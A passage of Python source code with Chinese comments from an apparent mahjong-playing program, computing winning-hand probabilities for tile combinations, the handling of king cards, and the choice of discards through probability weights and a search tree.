d_w*=1.2\n # print(\"i=\", i, d_w)\n return d_w\n\n # t2N列表最后的aa\n @staticmethod\n def is_last_aa(t2N=[]):\n \"\"\"\n 在计算评估值时,用于判断是否是最后一个aa\n 判断剩余搭子集合中是否还存在aa对子\n :param t2N:搭子集合\n :return: bool\n \"\"\"\n for t in t2N:\n if t[0] == t[1]:\n return False\n return True\n\n def choose_n(self, t2N=[], n=0, rate=1, results=[], ab=False, abSet=[]):\n \"\"\"\n 采用递归的方式,计算所有可能的胡牌的2N组合情况\n 在t2N中选择n个作为有效2N\n :param t2N: 待选搭子集合\n :param n: 待选数量\n :param rate: 本条路径的胡牌概率\n :param results: 计算结果列表形式 []\n :param ab: 本条路径中是否有ab的搭子\n :param abSet: 所有路径中是否存在ab的集合\n :return:\n \"\"\"\n if n == 0:\n results.append(rate)\n abSet.append(ab)\n return\n n_ = copy.copy(n)\n n_ -= 1\n for t2 in t2N:\n t2NCopy = MJ.deepcopy(t2N)\n t2NCopy.remove(t2)\n rate_ = copy.copy(rate)\n rate_ *= t2[2]\n if t2[0] != t2[1] or ab:\n ab_ = True\n else:\n ab_ = False\n\n self.choose_n(t2NCopy, n_, rate_, results, ab_, abSet)\n\n def calculate_path_w(self, a, king_num, feiKing=1):\n \"\"\"\n 一条组合集的胡牌概率评估\n 分为有宝和无宝,无宝中又分为有将和无将情况进行计算\n :param a: 组合集\n :param king_num: 宝牌数量\n :param feiKing: 飞宝数\n :return: 胡牌概率和废牌\n \"\"\"\n path_w = [feiKing, copy.copy(a[-1])]\n t2N = MJ.deepcopy(a[2] + a[3])\n efc_cards, t2_w = self.get_effective_cards_w(dz_set=t2N, left_num=self.leftNum)\n for i in range(len(t2N)):\n t2N[i].append(t2_w[i])\n bl = 4 - len(self.suits) - (len(a[0]) + len(a[1]))\n # print (\"cost t2N\", t2N)\n results = []\n abSet = []\n if king_num == 0: # 无宝\n # 对aa集合中选择一个作为将牌,在剩余的t2N中使用choose_n计算胡牌概率\n if a[2] != []: # 定将\n t2N[:len(a[2])] = sorted(t2N[:len(a[2])], key=lambda k: k[2],\n reverse=True) # 这里倒置会更好,如果aa的权重为0会导致整个评估为0\n t2N[len(a[2]):] = sorted(t2N[len(a[2]):], key=lambda k: k[2], reverse=True)\n # if len(a[2])-1 <= bl:\n # self.jiang_rate(t2N[:len(a[2])])\n\n # has_ab = False\n # print ('bl', bl)\n if bl <= len(t2N) - 1: # t2N溢出,需要出一张2N\n # aa_rate=self.jiang_rate(aa)\n t2NCP = MJ.deepcopy(t2N)\n if a[-1] == [] and t2N != [] and a[4] != 0: # 只添加最后的废牌: #只有当废牌区为空时,才将2N放入\n path_w[1].append(t2N[-1][0])\n path_w[1].append(t2N[-1][1])\n t2NCP.remove(t2N[-1])\n # yc=len(t2NCP)-1-bl\n\n for aa in t2NCP[:len(a[2])]:\n t2NCopy = MJ.deepcopy(t2NCP)\n t2NCopy.remove(aa)\n merge_rate = 0\n t2NCopy.sort(key=lambda k: k[2], reverse=True)\n i = 0\n for t2 in t2NCopy[bl - 1:]:\n i += 1\n merge_rate += t2[2]\n if i != 0:\n for j in range(i - 1):\n t2NCopy.pop(-1)\n t2NCopy[-1][2] = merge_rate\n # print t2NCP,i,'t2NCopy',t2NCopy\n\n self.choose_n(t2N=t2NCopy, n=bl, rate=1, results=results, ab=False, abSet=abSet)\n for i in range(len(abSet)):\n if results[i] != 1:\n if abSet[i]:\n results[i] = float(results[i]) / w_ab\n else:\n results[i] = float(results[i]) / w_aa * 1.5\n nums = math.factorial(bl)\n path_w[0] *= float(sum(results)) / nums\n # print(\"results\", results)\n\n\n else:\n for i in range(bl - len(t2N) + 1):\n path_w[0] *= (80.0) / (self.remainNum * self.remainNum)\n # rateSet=[]\n for aa in t2N[:len(a[2])]:\n t2NCopy = MJ.deepcopy(t2N)\n t2NCopy.remove(aa)\n # todo 可以不用这种计算方法\n self.choose_n(t2N=t2NCopy, n=len(t2NCopy), rate=1, results=results, ab=False,\n abSet=abSet) # rate=1 # for t2 in t2NCopy: # rate*=t2[2] # rateSet.append(rate)\n # for i in range(len(abSet)):\n # if results[i] != 1:\n # if abSet[i]:\n # results[i] = float(results[i]) / (1+w_ways)\n # else:\n # results[i] = float(results[i]) / (1+3*w_ways)\n nums = math.factorial(len(t2N) - 1)\n path_w[0] *= float(sum(results)) / nums\n\n # 未定将牌\n # 同理,没有将牌的时候,直接在choose_n中计算胡牌概率\n else:\n if len(t2N) >= bl:\n t2NCP = MJ.deepcopy(t2N)\n if a[-1] == [] and t2N != []: # 只添加最后的废牌: #只有当废牌区为空时,才将2N放入\n path_w[1].append(t2N[-1][0])\n path_w[1].append(t2N[-1][1])\n t2NCP.remove(t2N[-1])\n merge_rate = 0\n t2NCP.sort(key=lambda k: k[2], reverse=True)\n i = 0\n for t2 in t2NCP[bl - 1:]:\n i += 1\n merge_rate += t2[2]\n if i != 0:\n for j in range(i - 1):\n t2NCP.pop(-1)\n t2NCP[-1][2] = merge_rate\n self.choose_n(t2N=t2NCP, n=bl, rate=1, results=results)\n nums = math.factorial(bl)\n path_w[0] *= float(sum(results)) / nums\n else:\n for i in range(bl - len(t2N)):\n path_w[0] *= (80.0) / (self.remainNum * self.remainNum)\n # todo\n self.choose_n(t2N=t2N, n=len(t2N), rate=1, results=results)\n nums = math.factorial(len(t2N))\n path_w[0] *= float(sum(results)) / nums\n # 将概率获取\n left_cards = path_w[1]\n w_jiang = [0] * len(left_cards)\n for k in range(len(left_cards)):\n if translate16_33(left_cards[k]) == -1: # todo 添加的牌为0?\n n = 3.0\n else:\n n = float(self.leftNum[translate16_33(left_cards[k])])\n w_jiang[k] = float(n) / self.remainNum # 可以摸到宝牌与其他废牌一起的概率+left_num[translate16_33(king_card)]\n path_w[0] *= max(w_jiang) # 添加将牌概率\n if len(left_cards) > 1: # 填胡状态下,差一个将牌胡牌,这里\n path_w[1].remove(left_cards[w_jiang.index(max(w_jiang))])\n if a[-1] == [] and len(a[3]) == 1 and a[4] == 1: # 添加没有将牌,但有刻子与2N的出牌情景\n kz = [] # 存在刻子\n for t in a[0]:\n if t[0] == t[1]:\n kz = t\n break\n if kz != []:\n _, rate_out_3N = self.get_effective_cards_w(dz_set=a[3], left_num=self.leftNum)\n if float(rate_out_3N[0]) / w_ab > path_w[0]:\n path_w[0] = float(rate_out_3N[0]) / w_ab\n path_w[1] = [kz[0]]\n\n else:\n feiKingHu = 0\n\n # 计算摸到其他2N有效牌的概率\n if a[2] != [] and a[4] == 1 and king_num == 1 and len(t2N) == 2: # 向听数为1,一张宝牌,达到胡牌状态,但是一张宝没做宝吊,不能胡,xts=1:\n\n if len(a[2]) == 2: # 计算摸到2张aa的概率\n feiKingHu = float(t2N[0][2] + t2N[1][2]) / w_aa # 飞宝胡牌概率,为可\n\n elif len(a[2]) == 1 and len(a[3]) == 1: # 一张aa,一张ab\n feiKingHu = float(t2N[1][2]) / w_ab # 飞宝胡牌概率\n # if len(self.get_effective_cards(a[3])) == 1: # 当胡牌是ac这种时,/2.5\n # feiKingHu /= 2\n\n # todo aa过大会导致有aa就不飞宝\n t2N.sort(key=lambda k: k[2], reverse=True)\n if t2N[0][2] > t2N[1][2]:\n max2Nindex = 0\n else:\n max2Nindex = 1\n # if t2N[max2Nindex][0]==t2N[max2Nindex][1]:\n # NoFeiKingHu=float(t2N[max2Nindex][2])/w_aa*6 #矫正了真实的aa权重\n # else:\n # NoFeiKingHu=float(t2N[max2Nindex][2])/w_ab*2\n\n if feiKingHu * 5 < t2N[max2Nindex][2]: # 不飞宝,下调权重,增加飞宝概率\n # path_w[0] = t2N[max2Nindex][2]\n path_w[0] = t2N[max2Nindex][2]\n path_w[1].append(t2N[1 - max2Nindex][0]) # 添加废牌\n path_w[1].append(t2N[1 - max2Nindex][1])\n else: # 飞宝\n path_w[0] = feiKingHu * 2\n path_w[1].append(self.kingCard)\n #\n else: # 正常打\n # if True:\n t2N.sort(key=lambda k: k[2], reverse=True)\n if len(t2N) >= bl:\n if a[-1] == []:\n if t2N != []:\n\n path_w[1].append(t2N[-1][0])\n path_w[1].append(t2N[-1][1])\n t2NCP = MJ.deepcopy(t2N)\n t2NCP.remove(t2N[-1])\n\n # 不飞宝打法\n\n if bl - king_num + 1 >= 0:\n merge_rate = 0\n t2NCP.sort(key=lambda k: k[2], reverse=True)\n i = 0\n for t2 in t2NCP[bl - 1:]:\n i += 1\n merge_rate += t2[2]\n if i != 0:\n for j in range(i - 1):\n t2NCP.pop(-1)\n t2NCP[-1][2] = merge_rate\n # print ('t2NCP',t2NCP)\n self.choose_n(t2N=t2NCP, n=bl - king_num + 1, rate=1, results=results)\n nums = math.factorial(bl - king_num + 1)\n path_w[0] *= float(sum(results)) / nums\n\n # 飞宝打法\n\n aCopy = MJ.deepcopy(a)\n aCopy[-1].append(self.kingCard)\n # 宝-1后,再次计算胡牌概率,可能只有一个宝,所以会变为计算无宝的打法,还剩下宝会另计算\n path_w_feiKing = self.calculate_path_w(aCopy, king_num - 1, 2)\n # print ('comparable', path_w, path_w_feiKing)\n if path_w[0] <= path_w_feiKing[0] * feiKing:\n path_w = path_w_feiKing\n\n else:\n if bl - king_num + 1 >= 0:\n self.choose_n(t2N=t2N, n=bl - king_num + 1, rate=1, results=results)\n nums = math.factorial(bl - king_num + 1)\n path_w[0] *= float(sum(results)) / nums\n\n\n\n\n else: # 未溢出\n # t2NCP = copy.deepcopy(t2N)\n # for i in range(use_king):\n # t2NCP.pop(-1)\n # 不够的添加\n for i in range(bl - len(t2N)):\n path_w[0] *= (80.0) / (self.remainNum * self.remainNum)\n if len(t2N) - king_num + 1 >= 0:\n self.choose_n(t2N=t2N, n=len(t2N) - king_num + 1, rate=1, results=results)\n nums = math.factorial(len(t2N) - king_num + 1)\n path_w[0] *= float(sum(results)) / nums\n\n if king_num - 1 > len(t2N):\n use_king = len(t2N)\n else:\n use_king = king_num - 1\n if use_king > 0 and path_w[1] == []: # 表示宝牌未用完,这里可以打出一张宝牌\n for i in range(use_king):\n path_w[1].append(self.kingCard)\n # print ('results', results, len(results),nums)\n\n return path_w\n\n def cost(self, all, suits, left_num=[], king_num=0, king_card=None):\n \"\"\"\n 功能:计算组合评估值--胡牌概率,对组合中没有废牌的情况计算出废牌并输出\n 思路:计算胡牌概率,摸到有效牌概率的累乘值,分为有将牌或宝牌和无将牌2种情况处理,无将牌中需要计算将牌概率,有宝牌情况将1张宝作为将牌,\n 多余宝牌作为有效牌使用。对没有废牌的情况,将有效牌概率最低的搭子放入到废牌区\n :param all: 组合信息\n :param suits: 副露\n :param left_num: 剩余牌\n :param king_num: 宝数量\n :param king_card: 宝牌\n :return: path_w [rate,leftCards]组合的评估值和废牌\n \"\"\"\n # pengpenghu=True\n # for s in self.suits:\n # if s[0]!=s[1]:\n # pengpenghu=False\n # break\n # path_w[0] 胡牌概率\n # path_w[1] 废牌表\n path_w = [] # 创建一个存储胡牌概率和废牌的list\n for i in range(len(all)):\n path_w.append([1.0, MJ.deepcopy(all[i][-1])])\n\n # 全部搜索会导致搜索空间极大\n for index_all in range(len(all)): # 选出最大期望概率胡牌路径,选择该路径,从剩余牌中再选择最佳出牌顺序,局部最优\n\n path_w[index_all] = self.calculate_path_w(all[index_all], king_num, 1)\n\n # # else:\n # #\n # # for i in range(1, bl + 1):\n # # # if t2N[i][0] == t2N[i][1] and ((i + 1 == bl + 1) or self.is_last_aa(\n # # # t2N[i + 1:bl + 1])): # 最后一个aa可以享受第一个aa(将牌)的获取概率\n # # # path_w[index_all][0] *= (t2N[i][2] + t2N[0][2])\n # # # else:\n # # path_w[index_all][0] *= t2N[i][2]\n # # # if len(a[2])>1:\n # #\n # # if t2N[i][0] != t2N[i][1]:\n # # has_ab = True\n # # #aa将牌权重奖励\n # # path_w[index_all][0]*=len(a[2])\n # #\n # # #多余的2N也加到概率中来\n # # # rate_redundant=1\n # # # for i in range(bl+1,len(t2N)):\n # # # rate_redundant+=t2N[i][2]\n # # # path_w[index_all][0]*=rate_redundant\n # #\n # #\n # # for j in range(bl + 1, len(t2N)): # 废牌添加,\n # # if a[-1] == [] and j == len(t2N) - 1: # 只添加最后的废牌: #只有当废牌区为空时,才将2N放入\n # # path_w[index_all][1].append(t2N[-1][0])\n # # path_w[index_all][1].append(t2N[-1][1])\n # #\n # # else:\n # # for i in range(1, len(t2N)):\n # # # if t2N[i][0] == t2N[i][1] and ((i + 1 == len(t2N)) or self.is_last_aa(t2N[i + 1:])):\n # # # path_w[index_all][0] *= (t2N[i][2] + t2N[0][2])\n # # # else:\n # # path_w[index_all][0] *= t2N[i][2]\n # # if t2N[i][0] != t2N[i][1]:\n # # has_ab = True\n # # # aa将牌权重奖励\n # # path_w[index_all][0]*=len(a[2])\n # #\n # # for j in range(bl - len(t2N) + 1): # TODO 未填的3N ,这种处理方法有点粗糙\n # # path_w[index_all][0] *= float(100.0) / (self.remainNum * self.remainNum)\n # # #自摸权重为1,\n # # if path_w[index_all][0] != 1:\n # # if has_ab:\n # # path_w[index_all][0] *= 1.0 / w_ab\n # # else:\n # # path_w[index_all][0] *= 1.0 / w_aa\n #\n #\n # else: # 未定将牌\n # t2N = sorted(t2N, key=lambda k: k[2], reverse=True)\n # # has_ab=False\n # if bl <= len(t2N): # t2N溢出,需要出一张2N\n # for t in t2N[:bl]: # 计算胡牌概率\n # path_w[index_all][0] *= t[2]\n # # if t[0] != t[1]:\n # # has_ab = True\n # #多余2N的概率\n # # rate_redundant = 1\n # # for i in range(bl, len(t2N)):\n # # rate_redundant += t2N[i][2]\n # # path_w[index_all][0] *= rate_redundant\n #\n # for j in range(bl, len(t2N)): # 废牌添加\n # if a[-1] == [] and j == len(t2N) - 1: # 只添加最后的废牌: #只有当废牌区为空时,才将2N放入\n # path_w[index_all][1].append(t2N[-1][0])\n # path_w[index_all][1].append(t2N[-1][1])\n # else:\n # for t in t2N:\n # path_w[index_all][0] *= t[2]\n # # if t[0] != t[1]:\n # # has_ab = True\n # for j in range(bl - len(t2N)): # 未填的3N\n # path_w[index_all][0] *= float(100.0) / (self.remainNum * self.remainNum) # TODO 3N补充,待改进\n #\n # left_cards = path_w[index_all][1]\n #\n # w_jiang = [0] * len(left_cards)\n # for k in range(len(left_cards)):\n # w_jiang[k] = float(left_num[translate16_33(\n # left_cards[k])]) / self.remainNum # 可以摸到宝牌与其他废牌一起的概率+left_num[translate16_33(king_card)]\n # path_w[index_all][0] *= max(w_jiang) # 添加将牌概率\n # if len(left_cards) > 1: # 填胡状态下,差一个将牌胡牌,这里\n # path_w[index_all][1].remove(left_cards[w_jiang.index(max(w_jiang))])\n # if a[-1] == [] and len(a[3]) == 1: # 添加没有将牌,但有刻子与2N的出牌情景\n # kz = [] # 存在刻子\n # for t in a[0]:\n # if t[0] == t[1]:\n # kz = t\n # break\n # if kz != []:\n #\n # _, rate_out_3N = self.get_effective_cards_w(dz_set=a[3], left_num=left_num)\n # if float(rate_out_3N[0]) / w_aa > path_w[index_all][0]:\n # path_w[index_all][0] = float(rate_out_3N[0]) / w_aa\n # path_w[index_all][1] = [kz[0]]\n # # if pengpenghu and not has_ab:\n # # path_w[index_all][0]*=4\n # else: # 有宝,宝必须做宝吊或者飞宝,如34 66 king,飞宝成为选择之一\n # # 不飞宝:打6,计算摸到25概率,打3/4,计算摸到6的概率\n # # 飞宝:摸到34有效牌概率\n # feiKingHu = 0\n #\n # # 计算摸到其他2N有效牌的概率\n # if a[2] != [] and a[4] == 1 and king_num == 1 and len(\n # t2N) == 2: # 向听数为1,一张宝牌,达到胡牌状态,但是一张宝没做宝吊,不能胡,xts=1:\n # if len(a[2]) == 2: # 计算摸到2张aa的概率\n # # if pengpenghu:\n # # p=4\n # # else:\n # # p=1\n # feiKingHu = float(t2N[0][2] + t2N[1][2] + 2 * w_type) / w_aa # 飞宝胡牌概率,为可\n # print t2N[0][2],t2N[1][2]\n # elif len(a[2]) == 1 and len(a[3]) == 1: # 一张aa,一张ab\n # feiKingHu = float(t2N[1][2]) / w_ab # 飞宝胡牌概率\n #\n # t2N.sort(key=lambda k: k[2], reverse=True)\n # if t2N[0][2] > t2N[1][2]:\n # max2Nindex = 0\n # else:\n # max2Nindex = 1\n # # if t2N[max2Nindex][0]==t2N[max2Nindex][1]:\n # print ('11',feiKingHu * 3, t2N[max2Nindex][2])\n # if feiKingHu * 3 < t2N[max2Nindex][2]: # 不飞宝,下调权重,增加飞宝概率\n # path_w[index_all][0] = t2N[max2Nindex][2]\n #\n # path_w[index_all][1].append(t2N[1 - max2Nindex][0]) # 添加废牌\n # path_w[index_all][1].append(t2N[1 - max2Nindex][1])\n # else: # 飞宝\n # path_w[index_all][0] = feiKingHu\n # path_w[index_all][1].append(king_card)\n #\n # else: # 未达到胡牌状态时,先不打宝牌\n # # 废牌区已为空,打价值最低的t2N\n # # print (\"cost t2N\",t2N)\n # # has_ab=False\n # rate_hu = 0\n # use_king = king_num - 1\n #\n # print ('bl,len(t2N)', bl, len(t2N))\n # if bl <= len(t2N): # t2N溢出\n # t2N.sort(key=lambda k: k[2], reverse=True)\n # for i in range(bl - 1, -1, -1):\n # if use_king > 0: # 使用宝牌,rate_hu加上有效牌的概率,而不是乘\n # use_king -= 1\n # rate_hu += t2N[i][2]\n # continue\n # elif use_king == 0:\n # use_king = -1 # 表示宝牌已全部用完\n # if rate_hu != 0: # 待修改 说明宝牌的数量大于1,宝牌的作用可以给\n # path_w[index_all][0] *= (rate_hu + t2N[i][2])\n # continue\n # path_w[index_all][0] *= t2N[i][2]\n # # if t2N[i][0] != t2N[i][1]:\n # # has_ab = True\n # # if a[-1] == []: # 只有废牌区为空时,才添加2N\n #\n # # rate_redundant = 1\n # # for i in range(bl, len(t2N)):\n # # rate_redundant += t2N[i][2]\n # # path_w[index_all][0] *= rate_redundant\n #\n # for j in range(bl, len(t2N)): # 废牌添加\n # if a[-1] == [] and j == len(t2N) - 1: # 只添加最后的2N废牌\n # path_w[index_all][1].append(t2N[j][0])\n # path_w[index_all][1].append(t2N[j][1]) # path_w[index_all][0]=rate_hu\n # else: # t2N未溢出,需待填3N\n # t2N.sort(key=lambda k: k[2], reverse=True) # 添加了reverse\n # for i in range(len(t2N) - 1, -1, -1): # 反向计算t2N的获取概率\n # if use_king > 0: # 使用宝牌,rate_hu加上有效牌的概率,而不是乘\n # use_king -= 1\n # rate_hu += t2N[i][2]\n # continue\n # elif use_king == 0:\n # use_king = -1 # 表示宝牌已全部用完\n # if rate_hu != 0:\n # path_w[index_all][0] *= (rate_hu + t2N[i][2])\n # continue\n #\n # path_w[index_all][0] *= t2N[i][2]\n # for j in range(bl - len(t2N)): # 待填的3N\n # path_w[index_all][0] *= float(100.0) / (self.remainNum * self.remainNum) # TODO 有待补充\n # if use_king > 0 and path_w[index_all][1] == []: # 表示宝牌未用完,这里可以打出一张宝牌\n # for i in range(use_king):\n # path_w[index_all][1].append(king_card) # print (\"cost,bl t2N\",bl,t2N)0\n\n # print(\"path_w_end\", path_w)\n return path_w\n\n def discards_w(self, discards=[], left_num=[], ndcards={}):\n \"\"\"\n 功能:计算废牌评估,并返回评估值最低的废牌作为最后的出牌\n 思路:计算出每张废牌成为3N的概率,其中使用了搭子作为候选牌,例如废牌为5 ,当有66的情况时,将66作为已获取牌,并在leftCards中进行更新,将6的有效牌置为剩余牌总数\n :param discards: 废牌集合\n :param left_num: 剩余牌数量\n :param ndcards: 次级孤张牌\n :return: 最小评估值的废牌\n \"\"\"\n discards_w = []\n if discards == []:\n return 0x00\n for card in discards:\n left_numCP = copy.copy(left_num)\n if ndcards != {}:\n if card in ndcards.keys():\n for ndcard in ndcards[card]:\n left_numCP[convert_hex2index(ndcard)] = self.remainNum\n discards_w.append(self.left_card_weight(card=card, left_num=left_numCP)) # 更新点:添加废牌权重\n return discards[discards_w.index(min(discards_w))]\n\n def get_efcCards(self, dz_set=[]):\n \"\"\"\n 获取所有搭子的有效牌,不去重\n :param dz_set: 搭子集合\n :return: effective_cards [] 有效牌集合 不去重\n \"\"\"\n effective_cards = []\n for dz in dz_set:\n if len(dz) == 1:\n effective_cards.append([dz[0]])\n elif dz[1] == dz[0]:\n effective_cards.append([dz[0]])\n elif dz[1] == dz[0] + 1:\n if int(dz[0]) & 0x0F == 1:\n effective_cards.append([dz[0] + 2])\n elif int(dz[0]) & 0x0F == 8:\n effective_cards.append([dz[0] - 1])\n else:\n effective_cards.append([dz[0] - 1, dz[0] + 2])\n\n elif dz[1] == dz[0] + 2:\n effective_cards.append([dz[0] + 1])\n return effective_cards\n\n def contain(self, ab1=[], ab2=[]):\n \"\"\"\n 功能:计算组合是否存在包含关系,例如467中组合46会包含于67中,需要去除前者,避免重复计算。\n 思路:分别判断2个组合中的搭子有效牌是否存在包含关系,先分别获取搭子的有效牌,如果某一组合的所有有效牌都包含于另一组合,则判定该组合包含于另一组合中。\n 如果ab2有效牌全部包含于ab1 中,返回1,相反则返回2,没关系则返回0\n :param ab1: 组合1的搭子集合\n :param ab2: 组合2的搭子集合\n :return: int 如果ab2有效牌全部包含于ab1 中,返回1,相反则返回2,没关系则返回0\n \"\"\"\n efc1 = self.get_effective_cards(ab1)\n efc2 = self.get_effective_cards(ab2)\n\n # 判断ab1 是否包含于ab2中\n contain1in2 = True\n for ab in ab1:\n if ab in ab2:\n continue\n else:\n efc = self.get_effective_cards([ab])\n if len(efc) == 2:\n contain1in2 = False\n break\n elif efc[0] in efc2:\n continue\n else:\n contain1in2 = False\n break\n\n contain2in1 = True\n for ab in ab2:\n if ab in ab1:\n continue\n else:\n efc = self.get_effective_cards([ab])\n if len(efc) == 2:\n contain2in1 = False\n break\n elif efc[0] in efc1:\n continue\n else:\n contain2in1 = False\n break\n if contain1in2:\n return 2\n elif contain2in1:\n return 1\n else:\n return 0\n\n def mergeSameall(self, all):\n \"\"\"\n 功能:对组合进行去重处理,去除有效牌全部包含于另一组合的情况,例如 3456会被拆分为 345 456 两种情况,578 会被拆分为57和78情况,避免了后面评估值计算时的重复计算\n 思路:遍历组合,对本次组合后面的所有组合判断时候存在包含关系,当存在包含关系时,更新有效牌多的组合为本次的最终组合,并标记已被去除的组合,该组合不再被遍历\n :param all: 组合信息\n :return: 去重后的组合\n \"\"\"\n used_index = []\n all3 = []\n # 合并去掉\n # todo 有效牌相同的组也可以合并\n for i in range(len(all)): # 将2N相同的组合并\n a = MJ.deepcopy(all[i])\n if i in used_index:\n continue\n for j in range(i + 1, len(all)):\n if len(all[j][0]) + len(all[j][1]) == len(a[0]) + len(a[1]) and all[j][2] == a[2]:\n if all[j][3] == a[3]:\n used_index.append(j)\n for card in all[j][-1]:\n if card not in a[-1]:\n a[-1].append(card)\n # else:\n #\n # relation = self.contain(a[3], all[j][3])\n # if relation == 1:\n # # a=copy.copy(all[j])\n # used_index.append(j)\n #\n #\n # elif relation == 2: #todo 这样换可能会导致前面已经合并的被移除了.但是这种可能很少\n #\n # a = copy.deepcopy(all[j])\n # used_index.append(j)\n all3.append(a)\n return all3\n\n def defend_V2_2(self, all_combination):\n \"\"\"\n 功能:出牌策略\n 思路:分为3阶段,第一阶段完全孤张牌出牌策略,计算出所有组合中都包含的孤张牌,出评估值最低的孤张牌,剩余牌与孤张牌的联系性最低\n 第二阶段:当xts<=3时,采用搜索树计算出最佳出牌\n 第三阶段:当xts>3时,采用快速评估的方法计算出最佳出牌\n :param all_combination: 组合信息\n :return: 决策出牌\n \"\"\"\n\n '''\n 第一阶段:完全孤张牌出牌策略\n 原则:出相关性最低的孤张牌,剩余牌与孤张牌的联系性最低\n 现阶段只考虑xts最小的情况\n '''\n\n all_same_xts = []\n # all_same_xts_and_left = []\n\n min_xts = all_combination[0][-2]\n for a in all_combination: # 获取xts相同的组合\n if a[-2] == min_xts:\n all_same_xts.append(a)\n # if a[-2] == min_xts and len(a[-1])==len(all_combination[0][-1]):\n # all_same_xts_and_left.append(a)\n all_MG = copy.copy(all_same_xts)\n\n # 移除搭子有效牌被覆盖的划分 ,可能出现3 56的情况,3会获得更多的机会123,234,333,345\n # for a in all_same_xts:\n # flag = False\n # for t1 in a[-1]:\n # if not flag:\n # for t2 in a[2] + a[3]:\n # th = copy.copy(t2)\n # th.append(t1)\n # th.sort()\n # if th in MJ.T2_HALF:\n # if t2 not in MJ.T2_HALF_T2 or (\n # t2 in [[2, 4], [6, 8], [0x12, 0x14], [0x16, 0x18], [0x22, 0x24],\n # [0x26, 0x28]] and t1 not in [1, 9, 0x11, 0x19, 0x21, 0x29]):\n # logger.info(\"remove duplication cs, %s,%s,%s\", a, t2, t1)\n # all_MG.remove(a)\n # flag = True\n # break\n\n # if all_MG == []:\n # all_MG = all_same_xts\n\n # 去重处理\n # 有效牌数量为0的组合应该被视为废牌 todo 宝还原\n if True: # 这一段是必须的!\n if self.kingNum <= 1: # 这里只考虑出牌、宝做宝吊的情况\n for a in all_MG:\n for i in range(len(a[3]) - 1, -1, -1):\n ab = a[3][i]\n efc = self.get_effective_cards([ab])\n if sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc]) <= 0: # 先只算有效牌数量为0\n a[3].remove(ab)\n a[-1].extend(ab)\n # logger.info(\"remove ab with low getting rate, %s,%s,%s,a=%s\", self.cards, self.suits,\n # self.kingCard, a)\n # for a in all_MG: #todo 20201013\n # a_temp = MJ.deepcopy(a)\n # for i in range(len(a_temp[3]) - 1, -1, -1):\n # ab = a_temp[3][i]\n # efc = self.get_effective_cards([ab])\n # if sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc]) <= 1: #先只算有效牌数量为0\n # a_temp[3].remove(ab)\n # a_temp[-1].extend(ab)\n # # logger.info(\"append ab with low getting rate, %s,%s,%s,a=%s\", self.cards, self.suits, self.kingCard, a)\n # if a_temp!=a:\n # all_MG.append(a_temp)\n all_MG = self.xts(all_MG, self.suits, self.kingNum)\n\n # print ('all_MG', all_MG)\n left_all_cards = [] # 全部组合的废牌集合\n\n for branch in all_MG:\n left_all_cards += branch[-1]\n unique_l = list(set(left_all_cards))\n left_cards = [] # 任何组合都包含的真正废牌\n left_cards_w = []\n need_jiang = False\n if all_MG[0][-2] == 1:\n if len(all_MG[0][0]) + len(all_MG[0][1]) + len(self.suits) == 4 and all_MG[0][-1] == 2:\n need_jiang = True\n\n for card in unique_l:\n if left_all_cards.count(card) == len(all_MG):\n left_cards.append(card)\n left_cards_w.append(\n self.left_card_weight(card=card, left_num=LEFT_NUM, need_jiang=need_jiang)) # 更新点:添加废牌权重\n if left_cards != []: # and all_MG[0][-2]>3:\n # if min(left_cards_w)<25: #当出37 5 的时候需要限制下\n # 这里也只能在搭子过多的情况下才会出,给的限制条件放宽点\n # if need_jiang or ((not need_jiang) and min(left_cards_w)<70):\n if True:\n print('state first')\n return left_cards[left_cards_w.index(min(left_cards_w))]\n\n '''\n 第二阶段\n 当unique_l不为空时,从所有废牌(unique_l)中出一张\n 如果为空,从所有的t2N中出一张\n '''\n # 在xts<3的情况下,使用搜索树\n # if all_MG[0][4] <= 3:\n if False:\n Tree = SearchTree(cards=self.cards, suits=self.suits, leftNum=self.leftNum, all=all_same_xts,\n remainNum=self.remainNum, dgtable=[1] * 34, kingCard=self.kingCard,\n feiKingNum=self.fei_king)\n scoreDict = Tree.getCardScore()\n king_score = 0\n if self.kingCard in scoreDict.keys():\n king_score = scoreDict[self.kingCard]\n scoreDict = sorted(scoreDict.items(), key=lambda k: k[1], reverse=True)\n maxScoreCards = []\n # print ('scoreDict',scoreDict)\n if scoreDict != [] and king_score * 1.5 >= scoreDict[0][1]:\n return self.kingCard\n\n for i in range(len(scoreDict)):\n # print (scoreDict[i][1],scoreDict[0][1])\n if scoreDict[i][1] == scoreDict[0][1]:\n maxScoreCards.append(scoreDict[i][0])\n print('maxScoreCards', maxScoreCards)\n print(scoreDict)\n # if maxScoreCards != []:\n # return self.discards_w(maxScoreCards, self.leftNum, ndcards={})\n\n # 加入处理概率过低的搭子的组合\n # todo 容易出现超时,增加向听数小于等于3的限制条件\n if False:\n # if all_MG[0][-2]<=3:\n supplement = []\n for a in all_MG:\n # print a\n a_copy = MJ.deepcopy(a)\n for ab in a[3]:\n efc = self.get_effective_cards([ab])\n # print ab,sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc])\n if sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc]) <= 1:\n a_copy[3].remove(ab)\n a_copy[-1].extend(ab)\n # logger.info(\"remove rate 0 ab,%s,%s,%s,a=%s\", self.cards, self.suits, self.kingCard, a)\n # break\n\n if len(a_copy[3]) != len(a[3]):\n supplement.append(a_copy)\n # logger.info(\"supplement a1=%s,a2=%s\", a, a_copy)\n all_MG.extend(supplement)\n # print all_MG\n if False:\n # 加入碰碰胡处理 加到后面并不影响孤张出牌,只在搜索中使用碰碰胡\n rm_king = copy.copy(self.cards)\n for i in range(self.kingNum):\n rm_king.remove(self.kingCard)\n a_pengpenghu = self.pengpengHu(outKingCards=rm_king, suits=self.suits, kingNum=self.kingNum)\n if a_pengpenghu != [] and a_pengpenghu[0][-2] - 1 <= all_MG[0][-2]: # 现在用1\n if a_pengpenghu[0] not in all_MG: # 有可能已经存在于all_MG\n all_MG.append(a_pengpenghu[0])\n\n # 简化版搜索树\n if True:\n # if all_MG[0][-2]<=3:\n\n Tree = SearchTree_take(hand=self.cards, suits=self.suits, combination_sets=all_MG, king_card=self.kingCard,\n fei_king=self.fei_king)\n t1 = time.time()\n scoreDict, _ = Tree.get_discard_score()\n t2 = time.time()\n if t2 - t1 > 2.9: # 超时了\n print(\"搜索树搜索超时了!\")\n # logger.error(\"time:%i,info:%s, %s, %s\", t2 - t1, self.cards, self.suits, self.kingCard)\n king_score = 0 # 增加飞宝得分倍率1.5\n if self.kingCard in scoreDict.keys():\n 